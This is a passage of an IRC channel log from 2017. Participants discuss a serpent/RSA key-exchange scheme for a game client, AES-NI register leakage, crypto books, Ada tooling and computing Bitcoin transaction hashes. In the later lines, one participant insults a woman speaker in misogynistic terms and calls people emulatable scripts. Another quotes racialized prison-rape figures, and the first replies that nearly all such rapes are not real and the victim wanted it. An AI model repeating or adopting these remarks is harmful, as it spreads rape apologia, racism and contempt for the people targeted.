over 3 years and make anencyclopedia entry 1742244;1511391283;asciilifeform;almost impossible to bring up crypto in heathendom without a 'voice in the crowd' 'helpfully' reminding about 'standardized, well-designed aes' 1742245;1511391315;mircea_popescu;http://btcbase.org/log/2014-09-07#821766 1742246;1511391315;a111;Logged on 2014-09-07 18:00 mircea_popescu: It gets worse. Nearly every AES implementation using AESNI will leave two values in registers: The final block of output, and the final round key. The final block of output isn't a problem for encryption operations — it is ciphertext, which we can assume has leaked anyway — but for encryption an AES-128 key can be computed from the final round key, and for decryption the final round key is the AES-128 key. (For AES 1742247;1511391321;diana_coman;ha, back when I was blissfully only *playing* this game!! 1742248;1511391339;mircea_popescu;diana_coman those happy days. 1742249;1511391438;mircea_popescu;http://btcbase.org/log/2017-11-22#1742198 << how about actually using a 512 bit block 1742250;1511391438;a111;Logged on 2017-11-22 21:45 asciilifeform: anyway for 512bit key, you still keep the 128bit block. but each time you have incoming 128b plaintext, you shamir it rngistically into 512bits, i.e. 4 128b parcels that must be xor'd to reconstitute the original. each of these get ciphered with one of 4 independently-generated 128b keys. 1742251;1511391520;asciilifeform;mircea_popescu: serpent isn't defined as a stretchable thing - i.e. it isn't obvious what ought to be changed to produce a larger ( or smaller, for that matter ) block, and still to have it meaningfully similar to original 1742252;1511391557;asciilifeform;rather like the diff b/w sha512 and keccak 1742253;1511391572;asciilifeform;( the latter is defined as a family of functions, and so 'rubber' ) 1742254;1511391594;mircea_popescu;dja see why i'd muchly prefer a native tmsr.rsa length symmetric cypher rather than this nonsense ? 1742255;1511391603;asciilifeform;really not hard to see 1742256;1511391647;mircea_popescu;and why trhe fuck am i using "4 bit permutations" 1742257;1511391650;mircea_popescu;and so on and so on 1742258;1511391651;asciilifeform;it does cost moar tho. even once i'm done with the asm version. 1742259;1511391691;asciilifeform;modular exp is intrinsically costlier , at least on pc iron, than the idjit rotorization used in symmetrics 1742260;1511391777;mircea_popescu;anyway, whatever, diana_coman : the correct implementation approach to patch the 256 bit serpent into 4096 bit rsa is to cut every rsa block into 16 fragments, cipher each independently with diff keys, then paste the 16 keys together make 4096 bit of key. 1742261;1511391816;mircea_popescu;it's bullshit all the way down, "the 4096 bit block gets cut into 16 sub blocks to be fit into rotorizers that cut each block into 64 bits and process with their 4 bit s boxes". because we're from the fucking cartoons. 1742262;1511391882;asciilifeform;sad, innit. asciilifeform for instance has a mtbf of about 1hr when reading about symmetric ciphers. after that -- barf 1742263;1511391891;asciilifeform;because ultimately yes 'down to the 4bit sbox!' 1742264;1511392072;mircea_popescu;asciilifeform i have this itching half-memory that serpent 256 was actually defined 1742265;1511392085;asciilifeform;it was. 1742266;1511392092;asciilifeform;but ~key~ size 1742267;1511392097;asciilifeform;block was fixed at 128bit. 1742268;1511392107;diana_coman;mircea_popescu, 256 key, 128 block 1742269;1511392115;diana_coman;heh, crossed with asciilifeform 1742270;1511392210;mircea_popescu;asciilifeform right you are, it's in the... 2006 spec. 1742271;1511392324;mircea_popescu;in other lulz from same source (ross anderson of cambridge) http://www.cl.cam.ac.uk/~rja14/Papers/tamper.pdf 1742272;1511392327;mircea_popescu;that one from 1998 1742273;1511392353;asciilifeform;classic piece 1742274;1511392367;diana_coman;mircea_popescu, let me see if I got this right re "patch": simply apply serpent as it is and then at the next level up glue x keys together and send as "key", glue the corresponding x outputs together and use as "output"; basically lump together 16 serpents 1742275;1511392379;mircea_popescu;yea. 1742276;1511392420;mircea_popescu;asciilifeform the "specificication" published on cambridge page is most likely a later fake. it's a 2006 item supposedly of a 1998 document. 1742277;1511392448;mircea_popescu;OTHER 1998 documents, of lesser political sensitivity, exist there in original format. 1742278;1511392464;asciilifeform;mircea_popescu: the current serpent www is at the very minimum known to be missing items from before 1742279;1511392482;asciilifeform;so why not also serpent. 1742280;1511392491;asciilifeform;keccak, i meant, turned up missing items 1742281;1511392507;*;mircea_popescu doesn't recall why we picked up airbase 1 serpent in preference of japanese item ? 1742282;1511392517;asciilifeform;branch-free 1742283;1511392528;*;mircea_popescu is annoyed. 1742284;1511392541;asciilifeform;y'know the splits dun all have to be ciphered with same scheme 1742285;1511392657;mircea_popescu;asciilifeform dja recall the discssion with apelyobee fellow ? http://btcbase.org/log/2017-11-14#1737658 1742286;1511392657;a111;Logged on 2017-11-14 14:55 mircea_popescu: this is the problem with "complexify the code machine" tendency. somehow it appears intuitively evident that having a portion of the code INSIDE the machine is "a more complex, therefore a more secure system". it is not. 100% of the key belongs in the key. 1742287;1511392687;asciilifeform;sure 1742288;1511392737;asciilifeform;i read that line as a restatement of the ancient 'seekrit algos are a stupidity, honest crypto keeps only privkey seekrit' truism 1742289;1511392747;mircea_popescu;diana_coman and of course we end up with 8kb of bs "key" for every 4kb payload don't we. 1742290;1511392759;asciilifeform;16 1742291;1511392778;mircea_popescu;well 256 bit keys 128 bit blocks. 1742292;1511392793;asciilifeform;ah with no splits then yea 1742293;1511392805;mircea_popescu;so basically we'll be reusing serpent keys, is the idea ? 1742294;1511392877;asciilifeform;( in other 'gangrene ? what gangrene?' horrors : 'LibTomCrypt is pretty nice to read (only bug found in last 10 years was in prime generation — failed to iterate Miller-Rabin)' -- from turd https://comsecuris.com/slides/slides-bignum-bhus2015.pdf re broken bignumatrons. cited line presented as a 'hey it's pretty good'... ) 1742295;1511392924;mircea_popescu;check it out, diana_coman has found de-facto work-around to "my theme overwrites text up top" : put an intro in, page or so before code :D 1742296;1511392936;diana_coman;mircea_popescu, aha! 1742297;1511392940;mircea_popescu;smart. 1742298;1511393018;mircea_popescu;anyway, so what's the work mode here, every now and again server sends client a rsa-encrypted packet containing 16 aes keys ; client enciphers its comms to the server with one selected from a set of 8 selected from those 16 ; and deciphers server's with one selected from set of 8 other than previous set. now and again burns a key. 1742299;1511393028;mircea_popescu;when left with two unburned gets new set. 1742300;1511393058;diana_coman;mircea_popescu, aes keys?? 1742301;1511393068;mircea_popescu;sorry serpent keys 1742302;1511393075;asciilifeform;dun have to swap ~all~ the keys every time there's an rsagram 1742303;1511393079;mircea_popescu;sed 's/aes/serpent/' 1742304;1511393090;mircea_popescu;asciilifeform client just keeps a list. adds to it when rsagram 1742305;1511393097;mircea_popescu;strikes from it by criteria. 1742306;1511393102;asciilifeform;right 1742307;1511393123;mircea_popescu;this actually seems a rather workable method tbh. 1742308;1511393133;mircea_popescu;allows for very elastic packets / metering of security needs by user. 1742309;1511393159;asciilifeform;iirc this is the scheme asciilifeform originally suggested. 1742310;1511393170;mircea_popescu;diana_coman thereby all game packets will be multiples of 128 bits, and in principle a client can live off the first original rsa op its entire life if it so wishes. 1742311;1511393183;mircea_popescu;asciilifeform pretty cool. 1742312;1511393253;asciilifeform;it costs, however, http://btcbase.org/log/2017-11-22#1742216 . 1742313;1511393253;a111;Logged on 2017-11-22 21:56 asciilifeform: my approach is a universal 'stretcher', predicated on having reasonably fast and high-quality trng. 1742314;1511393255;mircea_popescu;diana_coman i guess we'll define a "control packet" which is always the first 128 bits of every comm, which will contain data such as "killed key #x moved to #y" and also "running out of keys send moar". 1742315;1511393265;mircea_popescu;asciilifeform sorry ? 1742316;1511393275;mircea_popescu;server generates all serpent keys. no stretching . 1742317;1511393278;asciilifeform;actually if client doesn't get to generate keys 1742318;1511393280;asciilifeform;aha right 1742319;1511393298;asciilifeform;if server generates all keys, client dun need an rng at all. 1742320;1511393309;asciilifeform;( aside from when creating his original rsa priv ) 1742321;1511393325;mircea_popescu;the major advantage of which is that user will be able to enjoy security flowing from server even without own fg. 1742322;1511393334;mircea_popescu;right. 1742323;1511393512;mircea_popescu;and suddenly the fg entropy debit is relevant : eulora server will be capable to produce iirc no more than 64 serpent keys/second per installed FG. 1742324;1511393535;mircea_popescu;in reality less as it draws some itself. 1742325;1511393553;asciilifeform;this is approx correct. 1742326;1511393569;mircea_popescu;so i'm guessing a daily-ish serpent key change per client is not unreasonable. 1742327;1511393584;asciilifeform;would depend on how populous, neh 1742328;1511393592;asciilifeform;with few enough clients, even hourly'd be workable 1742329;1511393595;mircea_popescu;but if memory serves the "attack" on serpent used 2^100 plaintexts sorta deal 1742330;1511393622;mircea_popescu;asciilifeform yes but taking the assumptions other way to see how bad it looks. 1742331;1511393625;mircea_popescu;imo dun look bad at all. 1742332;1511393795;diana_coman;mircea_popescu, 16 serpent keys means 16 keys of 256 bits each? 1742333;1511393810;mircea_popescu;right. 1742334;1511393971;diana_coman;mircea_popescu, and then when client enciphers with 1 from a set of 8 selected from those 16: does this mean reusing that 1 key for as many 128 chunks that particular eulora message has? or do you mean 1 per chunk ? 1742335;1511393989;mircea_popescu;it means reusing 1742336;1511394048;diana_coman;k, I think I got it 1742337;1511394123;mircea_popescu;in ~principle~ serpent doesn't expose the key anymore than it exposes the cipher. the claim is that if you know about 2^100 or so plaintext-ciphertext matches you can extract the key. 1742338;1511394149;mircea_popescu;now, the expectation is that a full day of play will produce less than say 2^15 or so messages. 1742339;1511394190;diana_coman;myeah, since reading more seriously on crypto I read a LOT of claims, certainly 1742340;1511394258;asciilifeform;diana_coman: there is ~nothing serious printed on the subject publicly since... von neumann 1742341;1511394373;asciilifeform;which is why 'hitting the books' is a very limited proposition. the most that can generally be asked from the dead trees, is an accurate picture of the popular algos, plus details of the most well-known attacks on various (e.g. lenstra's, pollard's, etc ) 1742342;1511394410;asciilifeform;but as for the general principles which a naive n00b might hope to find in such a work -- there's nothing since old man john von n. 1742343;1511394459;asciilifeform;( and , jaw-droppingly, just about every book 'on crypto' omits the otp proof. that very same, that constitutes the alpha and the omega of what's actually proven in the subject at all ) 1742344;1511394513;mircea_popescu;hey, every ro "blog" omits mention of trilema. 1742345;1511394517;mircea_popescu;dun look good together. 1742346;1511394546;asciilifeform;exactly same phenomenon imho 1742347;1511394567;asciilifeform;including the otp proof would immediately invite the q, in even a half-awake reader, of why the fuck the rest of the tree had to die 1742348;1511394576;asciilifeform;to produce the brick of nonsense that follows 1742349;1511394586;mircea_popescu;something quite like that. 1742350;1511394628;asciilifeform;in today's gnattronics finds : 1742351;1511394661;asciilifeform;1 ) build a gnat proj 2) gnatxref -a -aO path_where_your_ali_files_end_up yourmain.adb > xref.txt 1742352;1511394698;asciilifeform;shits forth a concordance, e.g. http://wotpaste.cascadianhacker.com/pastes/MDZMh/?raw=true . 1742353;1511394707;diana_coman;asciilifeform, I suspect it's quite possible that the writer would end up with that q so... no book 1742354;1511394727;asciilifeform;( full usage/dep topology for every named entity in your proj ) 1742355;1511394739;asciilifeform;with lines/columns where used, and where defined. 1742356;1511394758;diana_coman;that being said, whenever I find I don't even have that poor picture as full and as clear as I'd like, I'm still left with little other choice then to go and read; possibly again, what can I do 1742357;1511394776;asciilifeform;diana_coman: the writer is typically a schneier-style wretch who made 'the bargain' and very well knows about otp 1742358;1511394780;asciilifeform;and ain't sayin'. 1742359;1511394960;asciilifeform;diana_coman: aside from von neumann, and the crc encyclopaedia of well-known algos, i cannot in good conscience recommend much reading. there are works devoted to specific known attacks on rsa ( song y. yang, plus a few ru items ) ; at least 1 dead tree on differential cryptoanalysis ( how items like des get trivially demolished ) whose author presently escapes me; and that's just about it 1742360;1511395004;asciilifeform;you're prolly better off reviewing the fundamentals of information theory ( shannon et al ) 1742361;1511395064;asciilifeform;asking for 'good books on crypto' is not wholly unlike to ask 'good books in astrology' 1742362;1511395111;diana_coman;eh, 'good books in voodoo', let's not branch un-necessarily :p 1742363;1511395116;mircea_popescu;lmao 1742364;1511395496;shinohai;this is os hilarious http://archive.is/lPCer #etheredumb gonna fix bitcoin again hurr 1742365;1511395499;BingoBoingo;En otra preguntas: "Are we honering that stupid one year plant policy for Christmas trees?" 1742366;1511395657;ben_vulpes;shinohai: 'payinghyip' 1742367;1511395687;shinohai;mah ec20 tokens 1742368;1511395758;asciilifeform;shinohai: newer, cheaper grade of pinoy, or wat 1742369;1511395764;asciilifeform;physically painful to read. 1742370;1511395803;asciilifeform;'solve bitcoin's problem by forking it ourself' etc 1742371;1511395823;shinohai;https://www.reddit.com/r/altcoin/comments/7eveiu/bitcoin_2x_the_next_generation_of_crypto/dq7pvn2/ 1742372;1511395831;asciilifeform;i propose to enact this useful new word as a proper thing 1742373;1511395841;asciilifeform;if an anthill could speak, it would use word 'ourself' 1742374;1511395953;BingoBoingo; if an anthill could speak, it would use word 'ourself' << And the termitories use ourself too 1742375;1511396063;mircea_popescu;and in other news, it was established in teh harem over dinner that human demographics should prolly work on the basis of the alcohol used to spawn them 1742376;1511396074;mircea_popescu;thereby the jennifer generation mostly should be called tequilla-x 1742377;1511396084;mircea_popescu;succeeding beer-x which came after gin-x and so on 1742378;1511396109;asciilifeform;what was the 'jennifer generation' ? 1742379;1511396424;asciilifeform;( incidentally, mircea_popescu , possibly pertinent cultur-artifact, http://a-pesni.org/dvor/javychelrod.php ) 1742380;1511396437;asciilifeform;( whole site pretty decent imho. ) 1742381;1511397037;phf;asciilifeform: https://duckduckgo.com/?q=jennifer+aniston&t=ffab&iar=images&iax=images&ia=images i wonder if mp used that trop before, or it comes from tlp (i'm rereading tlp again) 1742382;1511397062;asciilifeform;lol agricultural face 1742383;1511398639;mircea_popescu;phf in my case it's genuinely because i fuck 21f cali. 1742384;1511398651;mircea_popescu;but anyway, 1742385;1511398655;mircea_popescu;!~google the jennifer hairdo 1742386;1511398656;jhvh1;mircea_popescu: See 13 Celebrities Who Have Rocked Jennifer Aniston's Rachel ...: ; Jennifer Aniston reveals why she hated 'The Rachel' haircut: ; The Story Behind Jennifer Aniston's Rachel Haircut | PEOPLE.com: (1 more message) 1742387;1511398776;mircea_popescu;asciilifeform lol i can't read this. wtf is it ? 1742388;1511398904;asciilifeform;mircea_popescu: prison folklore 1742389;1511398927;asciilifeform;at some point i'ma take a stab at translation. 1742390;1511398929;mircea_popescu;my vocab too poor 1742391;1511398947;BingoBoingo;lol 1742392;1511398996;mircea_popescu;pantsuited hilarity won miss world president race ourself. 1742393;1511399022;BingoBoingo;With maximust termiterity! 1742394;1511410441;BingoBoingo;!~ticker --market all 1742395;1511410446;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 8193.37, vol: 7970.22464966 | Bitfinex BTCUSD last: 8183.7, vol: 28256.73489211 | CampBX BTCUSD last: 3450.0, vol: 0 | Kraken BTCUSD last: 8203.5, vol: 2847.63427408 | Volume-weighted last average: 8187.1153965 1742396;1511410638;BingoBoingo;!~bcstats 1742397;1511410639;jhvh1;BingoBoingo: Current Blocks: 495672 | Current Difficulty: 1.364422081125E12 | Next Difficulty At Block: 495935 | Next Difficulty In: 263 blocks | Next Difficulty In About: 1 day, 21 hours, 57 minutes, and 14 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1742398;1511411070;mircea_popescu;and in other black girls code lulz, rorc girl explains FOSS : https://www.youtube.com/watch?v=T-QUSXpy3sk&feature=youtu.be&t=111 1742399;1511411933;phf;lulzy, but she really needs to do some inhalations and exhalations, this is some speaking 101 torture going on 1742400;1511412033;mircea_popescu;they're all fucking terrible. this one breathes like she's 1/3 on the way to orgasm. 1742401;1511412053;mircea_popescu;buncha "speakers" that are SO FUCKING ANXIOUS you'd think they never spoke to people. 1742402;1511412154;mircea_popescu;and since we're on this : i'm particularily insulted by the pretentions of ex-"journalists" owners of no more than two pairs of undewear and no two meatballs to rub together in their entrails at any given point that they're you know, postmodern women with preoccupations and opinions and options and whatnot. this shithead made in her entire 10 year long professional life a little over one bitcoin. 1742403;1511412198;mircea_popescu;yet there she sits, and like her one billion utterly useless facebook tards. i've no doubt she votes, but not randomly -- she thinks she reasons! and in another decade she's gonna write a "book". and so fucking following. 1742404;1511412248;mircea_popescu;in short, i've had it with the aferations of social participation coming from the facebook fake accounts up to fucking here. 1742405;1511412385;mircea_popescu;"oh but mp, wetware-run fake accounts are real!!!" like hell they are. the fact that zuck uses a buncha biosacks to do the job of ten lines of perl doesn't mean the biosacks aren't really shitty raspberrypis. what the fuck next, he's gonna run the shitstorm on z80s and pretend like the z80s are people because "they're louder, slower and burn more energy than proper computers" ?! THEY STILL DO THE EXACT SAME THING. 1742406;1511412487;mircea_popescu;"it's open source which means you don't have to know anything, just copy some codes from the endless information highway". ioana calen xrumer. 1742407;1511412641;phf;where's genghis kahn when you need him? (c) 1742408;1511412713;mircea_popescu;http://p.bvulpes.com/pastes/F4C3M/?raw=true << fucking illustratious. 1742409;1511412717;asciilifeform;http://btcbase.org/log/2017-11-23#1742400 << mm pretty tho 1742410;1511412717;a111;Logged on 2017-11-23 04:40 mircea_popescu: they're all fucking terrible. this one breathes like she's 1/3 on the way to orgasm. 1742411;1511412758;mircea_popescu;asciilifeform i randomly clicked a link from an 2008 article by the itisa dood. i suppose he was fucking her at the time or w/e. 1742412;1511412758;phf;obligatory https://www.youtube.com/watch?v=ita8xHOtv1k 1742413;1511412773;asciilifeform;mebbe helps that asciilifeform is sitting on a box with no sound card 1742414;1511412810;mircea_popescu;but this is the fucking "career" of these schmucks. born 83, graduated "college" 2003, worked as a fashion-culture-pop-media "editor" at some obscure local paper, then became "a PR officer!!1" by now pretending to "cultural management". motherfucker. management ?! 1742415;1511412822;mircea_popescu;for the same money could pretend to cultural engineering. which, obviously, they do. 1742416;1511412825;phf;asciilifeform: yeah, i had the same thought until she started speaking, i mean, shit, they don't have "toastmasters" in romania? practice your talk before going in front of people 1742417;1511412848;mircea_popescu;phf it's not that they don't have toastmasters in romania. it's that they don'tr have anything if you're born after 1980. 1742418;1511412852;mircea_popescu;and i mean this most literally. 1742419;1511412879;mircea_popescu;" At Buyerbrain, Ioana performs as a researcher and as a multidisciplinary perspective analyst, disseminating and promoting the neuroscience culture while also applying those principles to marketing and communicating the laboratory." you understand me ?! 1742420;1511412882;mircea_popescu;what fucking toastmasters. 1742421;1511412903;mircea_popescu;the neuroscience fucking culture so help me. 1742422;1511412915;asciilifeform;neuroscience culture..?! 1742423;1511412937;mircea_popescu;apparently what, on the basis of this malfunctioning spam script they also don't have basic logic in romania now ? 1742424;1511412943;phf;blockchain! 1742425;1511412985;mircea_popescu;yeah, that's the entomological value here : that these EXACTLY IDENTICAL fucktards haven't yet heard of THAT fashionable bullshit. so they're still working the old style nonsense. yet the underlying opcodes are very visibly exactly the same. 1742426;1511413002;mircea_popescu;allows for some diffing, "what's this z69 say vs that one ?" 1742427;1511413058;mircea_popescu;and i'll insist and underline that no, can not be the case these are people. if i can emulate 10k of them on a stock amd, they're not people, they're 1/10k of a stock amd. 1742428;1511413387;BingoBoingo;Biodiesel has an ourself too! 1742429;1511413400;mircea_popescu;the cat not worth teh skinning. 1742430;1511413638;BingoBoingo;Hence the bagplan 1742431;1511417935;BingoBoingo;In in other reddits https://www.counter-currents.com/2017/11/whos-doing-the-raping/ 1742432;1511417959;BingoBoingo;"To put specific numbers on this, the report notes that studies consistently find that more than 90% of prison rapes are inter-racial and racially motivated. Blacks are found to be some 80% of the perpetrators, and whites are the vast majority of victims. Again, this is easily accessible in a peer-reviewed report published at a mainstream outlet. (So how are desegregated prisons working out for us now, huh?)" 1742433;1511447333;mircea_popescu;BingoBoingo i'd say they're working great. 1742434;1511447352;mircea_popescu;contrary to pretense, under 1% of those are actual rapes, as defined by the only proper measure : "did you fight first ?" 1742435;1511447372;mircea_popescu;whiteboy gets what he always wanted and was too scared to ask for. 1742436;1511449088;mircea_popescu;aaand in other morning lulz, http://looksmax.net/Thread-Purplepill-what-are-legit-ways-of-making-millions-is-it-just-climbing-corporate-ladder?pid=65809&mode=linear 1742437;1511450401;diana_coman;ahahaha "like mircea popescu or whatever his name is, but even with him i suspect he's not anywhere near as rich as he wants people to think he is - it doesn't add up; poorly fitted suits, average looking hotel suites/condos, spends all his time living in cheap shitholes which is precisely what white people who have money to live abroad but aren't rich do)" ; from ^^ 1742438;1511450673;mircea_popescu;sure 1742439;1511450724;mircea_popescu;though mostly quoted for the fundamental prpblem -- these are college educated or educating esltards (maybe not ALL at MIT, but if you're on the internet.en you're either out of or currently in college) WHO DO NOT KNOW HOW TO BECOME MILLIONAIRES. 1742440;1511450733;mircea_popescu;can this be underscored enough ? i doubt it. 1742441;1511450763;mircea_popescu;the only fucking reason, point and selling characteristic of anglo college is "making money", and there's no quantum below 1 million dollars. 1742442;1511450795;mircea_popescu;yet... they do not know how to do it. AVERAGE salaries in the collegiate fields are about 100k/year, that means a 1mn income EACH DECADE, for AVERAGE performance 1742443;1511450801;mircea_popescu;and these kids dunno how to be millionaires. 1742444;1511450802;mircea_popescu;wut gives ? 1742445;1511450851;mircea_popescu;complete and utter failure of the "social contract", at that. it's like a sailing school that fails to produce sailors, this ourdemocracy that fails to produce millionaires. 1742446;1511450860;mircea_popescu;why the fuck else was anyone even watching the vhs tapes ?! 1742447;1511451797;asciilifeform;http://btcbase.org/log/2017-11-23#1742442 << much smaller than this, if you count what % they get to ~keep~. end up with '3rd world' figure. 1742448;1511451797;a111;Logged on 2017-11-23 15:26 mircea_popescu: yet... they do not know how to do it. AVERAGE salaries in the collegiate fields are about 100k/year, that means a 1mn income EACH DECADE, for AVERAGE performance 1742449;1511451947;asciilifeform;'LEGIT TESTOSTERONA OF HIGH QUALITY POWEDER DOESNT LEAVE YOU NO OPTIONS' << lol!! 1742450;1511451987;asciilifeform;hey BingoBoingo wtf is a 'testosterona' ? boiled goat balls, straight from 1950s quackeries ? 1742451;1511452042;asciilifeform;'just be female theory strikes again' 1742452;1511452059;asciilifeform;what am i even reading, 'looksmax.net' ?!? 1742453;1511452112;asciilifeform;'You can also try to solve one of the 7 millennium math problems for 1m each.' << hey there's a neglected get-rich-and-famous scheme! 1742454;1511452152;asciilifeform;'If you want to make real money in crypto, you don't get attached to one coin and you don't hodl, you also don't put all your money in bitcoin either, instead you do coin hopping' << didjaknow!! 1742455;1511452629;mircea_popescu;asciilifeform no but that's the very point! 1742456;1511452702;mircea_popescu;the complaint re mp's perceived lifestyle neartly folds into the general problem : "i think mp might be a millionaire as usg defined that term for me, but it seems in a sense fake, because he doesn't display the markers usg trained me to recognize. i wonder, if usg controls my perception of my own wants in the sense of defining how their perceptible form looks, why i don't get to be a millionaire ?" 1742457;1511452735;mircea_popescu;the discussion is readily mappable to its perfect equivalent which we oh so often rehash here : "i wonder what microsoft issued extension makes my operating system secure ?" 1742458;1511452763;mircea_popescu;"tmsr claims to be more powerful than the us, but i have my doubts, because their software doesn't even unicode." 1742459;1511452794;mircea_popescu;yes, schmucky mcschmuckersson, the REASON your software can't be powerful is EXACTLY that your software unicodes. not for the unicode itself, but for what the unicode IS. 1742460;1511452898;mircea_popescu;and so on and forever until we fall over, "how could i get everything i need and it'll only ever be something i wanted ???". 1742461;1511452899;mircea_popescu;hurr. 1742462;1511453315;asciilifeform;moar perplexing is wtf that forum is to begin with 1742463;1511453335;mircea_popescu;exactly like reddit, a website someone made in the hopes of becoming a millionaire. 1742464;1511453344;mircea_popescu;on it, the future of that country gathers. 1742465;1511453347;asciilifeform;'spam like a pro in 21 days' 1742466;1511453354;whaack;http://btcbase.org/log/2017-11-21#1741795 << I have code to take his blocks and count up all the satoshis in the outputs that have undeterminable destinations. This is not very useful without also subtracting the coins when they are spent. This requires storing the txn hash and output index while I count up the satoshis. However ben_vulpes's api does not provide the txn hash and I have no CL code (yet) to calculate it. 1742467;1511453354;a111;Logged on 2017-11-21 21:25 asciilifeform: whaack: not difficult to add up all of the various 'softfork' liquishit tho -- it shows up as 'cannot decode' on ben_vulpes's blockviewer 1742468;1511453381;whaack;Ultimately what I want to build is a tool to determine how much a miner can obtain by "defecting" from segwit from the current mempool 1742469;1511453386;mircea_popescu;how the hell could it not provide the txn hash 1742470;1511453388;asciilifeform;whaack: i posted an ada block eater a while back, do you have a copy ? 1742471;1511453403;mircea_popescu;what, it reserializes txn ? 1742472;1511453444;whaack;well the txn hash is provided as the inputs in the future blocks but each new txn in a block does not provide a copy of its hash as well afaik 1742473;1511453459;mircea_popescu;hm 1742474;1511453460;asciilifeform;( mine did not process scripts and so is currently of 0 direct use for whaack's item. but it does show how to compute tx hash ) 1742475;1511453490;asciilifeform;mircea_popescu: a tx does not carry own hash inside it ( how could it ), one has to compute it on the fly 1742476;1511453491;whaack;I do not have a copy 1742477;1511453500;asciilifeform;whaack: gimme a min 1742478;1511453529;mircea_popescu;asciilifeform yes but the hash is also the only sane index to txn 1742479;1511453534;asciilifeform;aha 1742480;1511453558;mircea_popescu;unless you actually go block44.txn7th, which is technically how spending goes, but anyway, i didn't expect he did that. 1742481;1511453828;phf;http://btcbase.org/log/2017-11-23#1742457 << "I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question." etc 1742482;1511453828;a111;Logged on 2017-11-23 15:58 mircea_popescu: the discussion is readily mappable to its perfect equivalent which we oh so often rehash here : "i wonder what microsoft issued extension makes my operating system secure ?" 1742483;1511453846;mircea_popescu;quite. 1742484;1511453872;mircea_popescu;also that ballas quote re giving up the capital. 1742485;1511453933;mircea_popescu;"Of course the idea is to get rich-- which sounds like capitalism, if you're retarded, but observe the message that is being taught: that the necessary correlate to getting rich is to give all the capital to someone else. The power is traded for the fetish of power. That's not capitalism, it is madness, and apparently Davos and Randi think women especially will heart it." 1742486;1511453960;mircea_popescu;in similar news, "i don't think jakob fugger was really all that rich -- after all, he didn't even have an ipad". 1742487;1511454045;phf;re upstack, there's been a resurgence of sorts of gopher protocol, various hipsters spinning up personal websites, etc. whether the resurgence was shortlived or i'm just late to the game, but there's already a community of wreckers (one of them groups is coming from this federated twitter platform, mastodon) discussing all the various ways that they want to "improve" gopher, tls, utf-8, markdown renderer, "minimal subset of html", etc. but at the same 1742488;1511454045;phf;time "gopher is awesome, because it's so simple and pure", yeah, before you fuckers decided to show up. 1742489;1511454049;mircea_popescu;and suddenly the seemingly unrelated byt alf linked, http://btcbase.org/log/2017-11-23#1742454 1742490;1511454049;a111;Logged on 2017-11-23 15:49 asciilifeform: 'If you want to make real money in crypto, you don't get attached to one coin and you don't hodl, you also don't put all your money in bitcoin either, instead you do coin hopping' << didjaknow!! 1742491;1511454060;mircea_popescu;is no longer unrelated at all. IT IS JUST A RESTATEMENT OF THE SAME THING! 1742492;1511454085;mircea_popescu;"in order to get rich (as usg defines that term) in crypto you gotta trade... the crypto... for the fetish of crypto!!11". see ? the lesson's well learned. 1742493;1511454184;phf;the frequency at which the word "modern" is used in those conversations is making me nauseous 1742494;1511454326;phf;naturally every other account is pronouns sensitive, lgbt, suicidal, "anti nazi", genderqueer, etc. thanksgiving is an opportunity to talk about how their toxic parents don't understand them, etc. 1742495;1511454410;phf;i was initially pissed off, but now i'm just sad, that babbage quote is very apropos 1742496;1511454478;mircea_popescu;not much there to get pissed of AT. 1742497;1511454515;asciilifeform;whaack: http://www.loper-os.org/pub/horse.tar.gz 1742498;1511454544;asciilifeform;whaack: unofficial demo of adatronic block eater. takes a raw binary block on commandline, parses, prints computed hashes. 1742499;1511454574;asciilifeform;you will need gnat, no other dependencies. 1742500;1511454597;asciilifeform;tarball is heavy on account of including a test block. 1742501;1511454611;asciilifeform;( the ada per se is 27kB ) 1742502;1511454616;phf;i keep expecting another trilema executing a coordinated strategy, but once you spend a few days living amongst them, you realize that there's nothing there, so yes. 1742503;1511454632;*;whaack takes a look. 1742504;1511454639;mircea_popescu;hey, many girls are seeking and have been long seeking, and never yet found anything. 1742505;1511454659;asciilifeform;whaack: posted simply so that you can see how tx hashes come to exist 1742506;1511454674;asciilifeform;but it is in fact a complete block-eater, with the exception that it does nothing useful with scripts. 1742507;1511454715;asciilifeform;diana_coman and other ada n00bz may find the item interesting, it is a complete proggy ( in the bare bone sense ) 1742508;1511454729;phf;project seti directed at earth 1742509;1511454735;mircea_popescu;quite. 1742510;1511454778;mircea_popescu;"mp is possibly not a millionaire seeing how he has girls combing the streets of poor countries looking for salvageable parts in the debris, as opposed to shooting photographs with the photographer's girlfriend like TRUE millionaires do" 1742511;1511454779;asciilifeform;whaack: if yer in a hurry you can skip straight to transactions.adb . 1742512;1511454788;whaack;asciilifeform: okay I plan to use ironclad to do the actual hashing in the cl implementation unless there is a better recommendation 1742513;1511454829;asciilifeform;whaack: if you have the time, why not write a sha256 from scratch in cl. it's a needed, unfortunately, piece. and afaik there isn't a proper one published. 1742514;1511454838;mircea_popescu;http://btcbase.org/log/2017-10-02#1719685 breadcrumbs. 1742515;1511454838;a111;Logged on 2017-10-02 19:09 mircea_popescu: sadly the story behind that is that denni parkinson was there with HER BOYFRIEND, who's some photog there to shoot some bs about branson's hobby (some kind of new and improved surfing) 1742516;1511454839;asciilifeform;phf possibly could correct me if this is not so 1742517;1511454895;phf;mircea_popescu: i'm still sad about that branson photo, every time i remember it, just have to shake my head 1742518;1511454903;mircea_popescu;ah but whay. 1742519;1511454916;asciilifeform;http://btcbase.org/log/2017-11-23#1742497 << almost forgot : b66009a9afe71b4cebe1a11b565f8848f0686b9f13748e87cc42eac6d376245048454a957550f764d8da8315245a0b0aeeea079e06fa4f6666bcf89e491ea371 (sha512) 1742520;1511454916;a111;Logged on 2017-11-23 16:28 asciilifeform: whaack: http://www.loper-os.org/pub/horse.tar.gz 1742521;1511454918;whaack;asciilifeform: okay I will give it a shot 1742522;1511454929;whaack;ty 1742523;1511454968;asciilifeform;http://btcbase.org/log/2017-11-23#1742487 << ahahahahahahaha 1742524;1511454968;a111;Logged on 2017-11-23 16:20 phf: re upstack, there's been a resurgence of sorts of gopher protocol, various hipsters spinning up personal websites, etc. whether the resurgence was shortlived or i'm just late to the game, but there's already a community of wreckers (one of them groups is coming from this federated twitter platform, mastodon) discussing all the various ways that they want to "improve" gopher, tls, utf-8, markdown renderer, "minimal subset of html", etc. but at the same 1742525;1511454983;asciilifeform;nothing like a flea luvvvs moar than a yet-flealess dog 1742526;1511454993;mircea_popescu;this much is not actually true. 1742527;1511455001;asciilifeform;i can picture how it might not be 